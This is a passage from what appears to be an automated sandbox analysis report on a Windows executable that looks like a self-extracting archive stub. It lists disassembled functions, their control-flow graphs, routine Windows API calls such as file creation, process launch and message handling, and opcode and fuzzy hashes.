18d00e-18d01c 848->849 850 18cfff-18d00c call 1817ac 848->850 854 18d079-18d07b 849->854 855 18d01e-18d020 849->855 850->849 862 18d072 850->862 854->840 859 18d07d-18d07f 854->859 855->854 860 18d022-18d028 855->860 856->846 859->840 863 18d081-18d084 ShowWindow 859->863 860->854 864 18d02a-18d034 860->864 862->854 863->840 864->854 865->848 866 18cfc6-18cfd7 GetExitCodeProcess 865->866 866->848 867 18cfd9-18cfe3 866->867 868 18cfea 867->868 869 18cfe5 867->869 868->848 869->868
                  APIs
                  • ShellExecuteExW.SHELL32(?), ref: 0018CF54
                  • ShowWindow.USER32(?,00000000), ref: 0018CF93
                  • GetExitCodeProcess.KERNEL32(?,?), ref: 0018CFCF
                  • CloseHandle.KERNEL32(?), ref: 0018CFF5
                  • ShowWindow.USER32(?,00000001), ref: 0018D084
                    • Part of subcall function 001817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0017BB05,00000000,.exe,?,?,00000800,?,?,001885DF,?), ref: 001817C2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                  • String ID: $.exe$.inf
                  • API String ID: 3686203788-2452507128
                  • Opcode ID: 42200fca25179cb19a0d9bcf231c8cfe6dbaaac0807a2d1833130589a775252e
                  • Instruction ID: d55eab3c7e3a13ee3c8811ec58144fc7b9f599e1b65f464c89fe5af741ff836e
                  • Opcode Fuzzy Hash: 42200fca25179cb19a0d9bcf231c8cfe6dbaaac0807a2d1833130589a775252e
                  • Instruction Fuzzy Hash: 6E61E7714083809AE731BF64D804AABBBF6EF95304F04481EF5C597291D7B19B85CFA2
                  Function 0019A058 Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 870 19a058-19a071 871 19a073-19a083 call 19e6ed 870->871 872 19a087-19a08c 870->872 871->872 879 19a085 871->879 873 19a099-19a0bd MultiByteToWideChar 872->873 874 19a08e-19a096 872->874 877 19a250-19a263 call 18ec4a 873->877 878 19a0c3-19a0cf 873->878 874->873 880 19a0d1-19a0e2 878->880 881 19a123 878->881 879->872 884 19a101-19a112 call 198518 880->884 885 19a0e4-19a0f3 call 1a1a30 880->885 883 19a125-19a127 881->883 887 19a12d-19a140 MultiByteToWideChar 883->887 888 19a245 883->888 884->888 898 19a118 884->898 885->888 897 19a0f9-19a0ff 885->897 887->888 891 19a146-19a158 call 19a72c 887->891 892 19a247-19a24e call 19a2c0 888->892 899 19a15d-19a161 891->899 892->877 901 19a11e-19a121 897->901 898->901 899->888 902 19a167-19a16e 899->902 901->883 903 19a1a8-19a1b4 902->903 904 19a170-19a175 902->904 906 19a200 903->906 907 19a1b6-19a1c7 903->907 904->892 905 19a17b-19a17d 904->905 905->888 908 19a183-19a19d call 19a72c 905->908 909 19a202-19a204 906->909 910 19a1c9-19a1d8 call 1a1a30 907->910 911 19a1e2-19a1f3 call 198518 907->911 908->892 925 19a1a3 908->925 915 19a23e-19a244 call 19a2c0 909->915 916 19a206-19a21f call 19a72c 909->916 910->915 922 19a1da-19a1e0 910->922 911->915 924 19a1f5 911->924 915->888 916->915 928 19a221-19a228 916->928 927 19a1fb-19a1fe 922->927 924->927 925->888 927->909 929 19a22a-19a22b 928->929 930 19a264-19a26a 928->930 931 19a22c-19a23c WideCharToMultiByte 929->931 930->931 931->915 932 19a26c-19a273 call 19a2c0 931->932 932->892
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00194E35,00194E35,?,?,?,0019A2A9,00000001,00000001,3FE85006), ref: 0019A0B2
                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0019A2A9,00000001,00000001,3FE85006,?,?,?), ref: 0019A138
                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0019A232
                  • __freea.LIBCMT ref: 0019A23F
                    • Part of subcall function 00198518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0019C13D,00000000,?,001967E2,?,00000008,?,001989AD,?,?,?), ref: 0019854A
                  • __freea.LIBCMT ref: 0019A248
                  • __freea.LIBCMT ref: 0019A26D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                  • String ID:
                  • API String ID: 1414292761-0
                  • Opcode ID: aff0212f3da0e2fa7a4caa165f90cf2537a7cadf14e8afb59122e642a10a86b0
                  • Instruction ID: 2f7624a7202b5cab5b9d9b8c01be6817abdce69a6eb39b0b44879fcaa4bf12d6
                  • Opcode Fuzzy Hash: aff0212f3da0e2fa7a4caa165f90cf2537a7cadf14e8afb59122e642a10a86b0
                  • Instruction Fuzzy Hash: 8051C172610216AFEF298F64CC41EBB77AAEF51B50F954229FC04D6180DB36DC4886E2
                  Function 0018A335 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35comCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00180085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001800A0
                    • Part of subcall function 00180085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0017EB86,Crypt32.dll,00000000,0017EC0A,?,?,0017EBEC,?,?,?), ref: 001800C2
                  • OleInitialize.OLE32(00000000), ref: 0018A34E
                  • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0018A385
                  • SHGetMalloc.SHELL32(001B8430), ref: 0018A38F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                  • String ID: riched20.dll$3Ro
                  • API String ID: 3498096277-3613677438
                  • Opcode ID: 6bc206159b03763af6b6f0f33fcbe03382625190ec87f42d66afa3e7815ae5e1
                  • Instruction ID: 43cc4cfcf1cb0b9914fa5fed18db34d765be38ea52ca78aa98b425c2fe60f4ef
                  • Opcode Fuzzy Hash: 6bc206159b03763af6b6f0f33fcbe03382625190ec87f42d66afa3e7815ae5e1
                  • Instruction Fuzzy Hash: A4F0E7B5901209ABCB10AF9998499EFFBFCEBA5701F00416AF864E2211DBB456458FA1
                  Function 001799B0 Relevance: 7.6, APIs: 5, Instructions: 117filetimeCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 939 1799b0-1799d1 call 18e360 942 1799d3-1799d6 939->942 943 1799dc 939->943 942->943 944 1799d8-1799da 942->944 945 1799de-1799fb 943->945 944->945 946 179a03-179a0d 945->946 947 1799fd 945->947 948 179a12-179a31 call 1770bf 946->948 949 179a0f 946->949 947->946 952 179a33 948->952 953 179a39-179a57 CreateFileW 948->953 949->948 952->953 954 179abb-179ac0 953->954 955 179a59-179a7b GetLastError call 17b66c 953->955 956 179ac2-179ac5 954->956 957 179ae1-179af5 954->957 964 179a7d-179a9f CreateFileW GetLastError 955->964 965 179aaa-179aaf 955->965 956->957 959 179ac7-179adb SetFileTime 956->959 960 179af7-179b0f call 17fe56 957->960 961 179b13-179b1e 957->961 959->957 960->961 968 179aa5-179aa8 964->968 969 179aa1 964->969 965->954 966 179ab1 965->966 966->954 968->954 968->965 969->968
                  APIs
                  • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,001778AD,?,00000005,?,00000011), ref: 00179A4C
                  • GetLastError.KERNEL32(?,?,001778AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00179A59
                  • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,001778AD,?,00000005,?), ref: 00179A8E
                  • GetLastError.KERNEL32(?,?,001778AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00179A96
                  • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,001778AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00179ADB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: File$CreateErrorLast$Time
                  • String ID:
                  • API String ID: 1999340476-0
                  • Opcode ID: 230033687ea5cf3c82c3ba3011bf9366b7c3cdef795e6d7795195bff44f95b1a
                  • Instruction ID: 52748a09092eaf5fc0d0fb015436ec7e9075f079709b3835530af91eeccf1cb8
                  • Opcode Fuzzy Hash: 230033687ea5cf3c82c3ba3011bf9366b7c3cdef795e6d7795195bff44f95b1a
                  • Instruction Fuzzy Hash: 2F4143705457466FE320DB20CC06BDABBE4BB06324F108719FAE8971D1E7B5A98CCB95
                  Function 0018AC74 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 998 18ac74-18ac8d PeekMessageW 999 18acc8-18accc 998->999 1000 18ac8f-18aca3 GetMessageW 998->1000 1001 18acb4-18acc2 TranslateMessage DispatchMessageW 1000->1001 1002 18aca5-18acb2 IsDialogMessageW 1000->1002 1001->999 1002->999 1002->1001
                  APIs
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0018AC85
                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0018AC96
                  • IsDialogMessageW.USER32(00010484,?), ref: 0018ACAA
                  • TranslateMessage.USER32(?), ref: 0018ACB8
                  • DispatchMessageW.USER32(?), ref: 0018ACC2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Message$DialogDispatchPeekTranslate
                  • String ID:
                  • API String ID: 1266772231-0
                  • Opcode ID: 6299483405a661a33d5da8000913344f55f21eaf44f7cc8992ed5964fb82a117
                  • Instruction ID: a6b79256b4f40f95f61a9ad63feda358b37bd70ebe79b7e99762e7cbd257dd0c
                  • Opcode Fuzzy Hash: 6299483405a661a33d5da8000913344f55f21eaf44f7cc8992ed5964fb82a117
                  • Instruction Fuzzy Hash: 9EF01D71903129AB9B20ABE69C4CEEF7F6CEF152517408516F415D2500EB38D545CBB1
                  Function 0018A2C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1003 18a2c7-18a2e6 GetClassNameW 1004 18a2e8-18a2fd call 1817ac 1003->1004 1005 18a30e-18a310 1003->1005 1010 18a30d 1004->1010 1011 18a2ff-18a30b FindWindowExW 1004->1011 1007 18a31b-18a31f 1005->1007 1008 18a312-18a315 SHAutoComplete 1005->1008 1008->1007 1010->1005 1011->1010
                  APIs
                  • GetClassNameW.USER32(?,?,00000050), ref: 0018A2DE
                  • SHAutoComplete.SHLWAPI(?,00000010), ref: 0018A315
                    • Part of subcall function 001817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0017BB05,00000000,.exe,?,?,00000800,?,?,001885DF,?), ref: 001817C2
                  • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0018A305
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                  • String ID: EDIT
                  • API String ID: 4243998846-3080729518
                  • Opcode ID: 3d8329dde8f649dca5f7495a4c3ab201e258d14a625571ca5f921b5f6cc52f0f
                  • Instruction ID: 704d66a896c857748c4c24c45558347adff510636c46c3425e8507891f97ab03
                  • Opcode Fuzzy Hash: 3d8329dde8f649dca5f7495a4c3ab201e258d14a625571ca5f921b5f6cc52f0f
                  • Instruction Fuzzy Hash: C8F08232A422287BE720A6649C05F9B776CAF56B10F480057FD05A2180D770AA81CAF6
                  Function 0018D287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1012 18d287-18d2b2 call 18e360 SetEnvironmentVariableW call 17fbd8 1016 18d2b7-18d2bb 1012->1016 1017 18d2bd-18d2c1 1016->1017 1018 18d2df-18d2e3 1016->1018 1019 18d2ca-18d2d1 call 17fcf1 1017->1019 1022 18d2c3-18d2c9 1019->1022 1023 18d2d3-18d2d9 SetEnvironmentVariableW 1019->1023 1022->1019 1023->1018
                  APIs
                  • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0018D29D
                  • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0018D2D9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: EnvironmentVariable
                  • String ID: sfxcmd$sfxpar
                  • API String ID: 1431749950-3493335439
                  • Opcode ID: fd14d9a630706ecca90c9effd0903fe68630db11464327fcb06934b73afb4155
                  • Instruction ID: 580819047528a2a780ea904c69b34b8d63e6a94fa16af4699dffe681837f8291
                  • Opcode Fuzzy Hash: fd14d9a630706ecca90c9effd0903fe68630db11464327fcb06934b73afb4155
                  • Instruction Fuzzy Hash: C5F0A772800228A6C7203FE09C09FBA77AAAF1A751B044055FC4896181D760CE81DBF1
                  Function 0017984E Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1024 17984e-17985a 1025 179867-17987e ReadFile 1024->1025 1026 17985c-179864 GetStdHandle 1024->1026 1027 179880-179889 call 179989 1025->1027 1028 1798da 1025->1028 1026->1025 1032 1798a2-1798a6 1027->1032 1033 17988b-179893 1027->1033 1030 1798dd-1798e2 1028->1030 1035 1798b7-1798bb 1032->1035 1036 1798a8-1798b1 GetLastError 1032->1036 1033->1032 1034 179895 1033->1034 1039 179896-1798a0 call 17984e 1034->1039 1037 1798d5-1798d8 1035->1037 1038 1798bd-1798c5 1035->1038 1036->1035 1040 1798b3-1798b5 1036->1040 1037->1030 1038->1037 1041 1798c7-1798d0 GetLastError 1038->1041 1039->1030 1040->1030 1041->1037 1043 1798d2-1798d3 1041->1043 1043->1039
                  APIs
                  • GetStdHandle.KERNEL32(000000F6), ref: 0017985E
                  • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00179876
                  • GetLastError.KERNEL32 ref: 001798A8
                  • GetLastError.KERNEL32 ref: 001798C7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ErrorLast$FileHandleRead
                  • String ID:
                  • API String ID: 2244327787-0
                  • Opcode ID: d7365e08a6ec709d964af487ad94c6efbbdcd9f2e74051a2186d04e6bd1ceb7e
                  • Instruction ID: 7c27f4e6d9670e20365e8838ba12d3d60091e4425f6618f0923ec0981ed84845
                  • Opcode Fuzzy Hash: d7365e08a6ec709d964af487ad94c6efbbdcd9f2e74051a2186d04e6bd1ceb7e
                  • Instruction Fuzzy Hash: DA118E3090060CEBDB205B55C904A7977B8FB1B731F10C52AF86E95A90D7359E889F53
                  Function 0019A4F4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00193713,00000000,00000000,?,0019A49B,00193713,00000000,00000000,00000000,?,0019A698,00000006,FlsSetValue), ref: 0019A526
                  • GetLastError.KERNEL32(?,0019A49B,00193713,00000000,00000000,00000000,?,0019A698,00000006,FlsSetValue,001A7348,001A7350,00000000,00000364,?,00199077), ref: 0019A532
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0019A49B,00193713,00000000,00000000,00000000,?,0019A698,00000006,FlsSetValue,001A7348,001A7350,00000000), ref: 0019A540
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: LibraryLoad$ErrorLast
                  • String ID:
                  • API String ID: 3177248105-0
                  • Opcode ID: 696e9eb145b968c8cbbe3c75819fc8b1ae95d428498f766d1a97929f80a02fe2
                  • Instruction ID: fae23b956ddeb75d96b77b55606b18ba263ad48e693e81c435078d44cfd32e52
                  • Opcode Fuzzy Hash: 696e9eb145b968c8cbbe3c75819fc8b1ae95d428498f766d1a97929f80a02fe2
                  • Instruction Fuzzy Hash: C4012632711222ABDF218B68AC44B67BB98AF46BA1B660620F916D3140D731DA44CAE1
                  Function 00179F2F Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                  Download Yara Rule
                  APIs
                  • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,0017CC94,00000001,?,?,?,00000000,00184ECD,?,?,?), ref: 00179F4C
                  • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00184ECD,?,?,?,?,?,00184972,?), ref: 00179F8E
                  • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,0017CC94,00000001,?,?), ref: 00179FB8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: FileWrite$Handle
                  • String ID:
                  • API String ID: 4209713984-0
                  • Opcode ID: 7bd4eeec923691ce0eff9f526ae10cb7770c3d63044affa376158ab0fff2adf9
                  • Instruction ID: 973afaf8be591bb5ace40baff8748cc61b6790765e98f3dc902daa65a6436e9e
                  • Opcode Fuzzy Hash: 7bd4eeec923691ce0eff9f526ae10cb7770c3d63044affa376158ab0fff2adf9
                  • Instruction Fuzzy Hash: D631DE712083059BDB148F24D948BAABBB8EF91710F048A5DF859DA281C775D948CBA2
                  Function 0017A207 Relevance: 4.6, APIs: 3, Instructions: 56COMMON
                  Download Yara Rule
                  APIs
                  • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0017A113,?,00000001,00000000,?,?), ref: 0017A22E
                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0017A113,?,00000001,00000000,?,?), ref: 0017A261
                  • GetLastError.KERNEL32(?,?,?,?,0017A113,?,00000001,00000000,?,?), ref: 0017A27E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: CreateDirectory$ErrorLast
                  • String ID:
                  • API String ID: 2485089472-0
                  • Opcode ID: af57b4d850cb892efcbceb3e01d894388958de147c19601f1f6d26e98887acab
                  • Instruction ID: 5e20d5cba7ada65f3c8e4a9176fffb14e250a170d7c88b8eee5eadde9bd9fb41
                  • Opcode Fuzzy Hash: af57b4d850cb892efcbceb3e01d894388958de147c19601f1f6d26e98887acab
                  • Instruction Fuzzy Hash: D301F531144214A6DB32AB744C05BED3778AF57781F84C451F90DE5052CB62CA80C6B7
                  Function 0019AFF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                  Download Yara Rule
                  APIs
                  • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0019B019
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Info
                  • String ID:
                  • API String ID: 1807457897-3916222277
                  • Opcode ID: 2f766e552c9995af1344c7ff9a62933aebba5718b5ea217789f2dcb58528cac2
                  • Instruction ID: ca57d52fb9f7ffd6e1d3df41539cea221d2d363b513095a3e9850925481bdd5b
                  • Opcode Fuzzy Hash: 2f766e552c9995af1344c7ff9a62933aebba5718b5ea217789f2dcb58528cac2
                  • Instruction Fuzzy Hash: B441277050834C9BDF258E24ADD4BFBBBB9EB55704F1804ECE59A87142D335AA45CF60
                  Function 0019A72C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
